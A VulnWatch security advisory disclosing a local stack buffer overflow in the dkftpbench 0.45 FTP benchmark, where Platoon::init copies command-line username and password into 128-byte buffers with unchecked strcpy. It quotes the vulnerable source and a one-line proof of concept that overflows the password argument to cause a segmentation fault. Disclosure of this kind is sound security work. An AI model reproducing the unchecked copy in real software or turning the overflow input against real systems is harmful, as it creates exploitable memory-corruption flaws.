[VulnWatch] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability



Description:

dkftpbench is an FTP benchmark program inspired by SPECweb99. The
result of the benchmark is a number-of-simultaneous-users rating;
after running the benchmark properly, you have a good idea how many
simultaneous dialup clients a server can support. The target bandwidth
per client is set at 28.8 kilobits/second to model dialup users; this
is important for servers on the real Internet, which often serve
thousands of clients on only 10 MBits/sec of bandwidth.
Found buffer overflow in Platoon::init function using strcpy() with no
sizelen control.
source: http://www.kegel.com/dkftpbench/

Source error:

in main():
--
int main(int argc, char **argv)
{
[..]
const char *arg_username = "anonymous";
const char *arg_password = "robouser@";

[..]
} else if (!strncmp(argv[i], "-u", 2)) {
arg_username = &argv[i][2];
} else if (!strncmp(argv[i], "-p", 2)) {
arg_password = &argv[i][2];

[..]
Platoon thePlatoon;
thePlatoon.init(poller, &sked, arg_filename,
arg_clientBandwidth, arg_minClientBandwidth, arg_mtu,
arg_hostname, arg_portnum, arg_username, arg_password,
local_addrs, n_local_addrs);

[..]
}
--

in Platoon.h:
--
/// The user name part of the URL to fetch
char m_username[128];
/// The password part of the URL to fetch
char m_passwd[128];
--

in Platoon.c:
--
void Platoon::init(Poller *poller, Sked *sked, const char *filename,
int maxBytesPerSec, int minBytesPerSec, int bytesPerRead,
const char *servername, int port,
const char *username, const char *passwd,
struct sockaddr_in *local_addrs, int n_local_addrs)
{
[..]
m_port = port;
m_sked = sked;
strcpy(m_passwd, passwd);
strcpy(m_servername, servername);
strcpy(m_username, username);
m_verbosity = 0;
m_local_addrs = local_addrs;
[..]
}
--

Proof of concept:

$ dkftpbench -n1 -hlocalhost -p21 -u test -p`perl -e "print 'A'x135"` -v1
-h127.0.0.1 host name of ftp server
-P21 port number of ftp server
-n1 number of users
-c1 target number of simultaneous connection attempts
-k2 Start next connection when: 1=immediately, 2=after prev connect complete
-t0 length of run (in seconds)
-b3600 desired bandwidth (in bytes per second)
-B2700 min acceptable per-client bandwidth (in bytes per second)
-ufederico user name
-paaaaaa[..]
-fusenet/rec.juggling/juggling.FAQ.Z file to fetch
-m1500 bytes per 'packet'
-v1 verbosity
-sp selector (p=poll, s=select, d=/dev/poll, k=kqueue, r=rtsig, f=sig-per-fd)
-a0 use all local interfaces
Using poll()
Segmentation fault
$

--
.original http://intel.shacknet.nu/
~ starcadi



Relevant Pages

  • Re: IIS 6.0 FTP
    ... if your ftp is working first. ... So, go to the remote machine (which allow to connect to your iis server), go ... The ftp server connection msgs you posted, doesn't look like IIS FTP to me. ... clients are using an order entry program created in Microsoft access. ...
    (microsoft.public.inetserver.iis.ftp)
  • Re: IIS 6.0 FTP
    ... if your ftp is working first. ... So, go to the remote machine (which allow to connect to your iis server), go ... The ftp server connection msgs you posted, doesn't look like IIS FTP to me. ... clients are using an order entry program created in Microsoft access. ...
    (microsoft.public.inetserver.iis.ftp)
  • Re: IIS 6.0 FTP
    ... Server port: 21. ... I doubt IIS FTP has such feature. ... next, general 530 error indicating login failed, that could due to ... clients are using an order entry program created in Microsoft access. ...
    (microsoft.public.inetserver.iis.ftp)
  • Re: SBS2000, ISA server, FTP does not work on clients
    ... I'm going to try disabling packet filtering on the ISA ... between the second NIC on the server and the broadband ... ftp of the clients working of course) as the 'firewall' ... >clients to use FTP services? ...
    (microsoft.public.backoffice.smallbiz2000)
  • [NEWS] OpenTTD Multiple DoS
    ... OpenTTD Client and Server. ... Clients are affected by an harmless bug when they handle UDP packets. ... int timeout; ... buff = malloc; ...
    (Securiteam)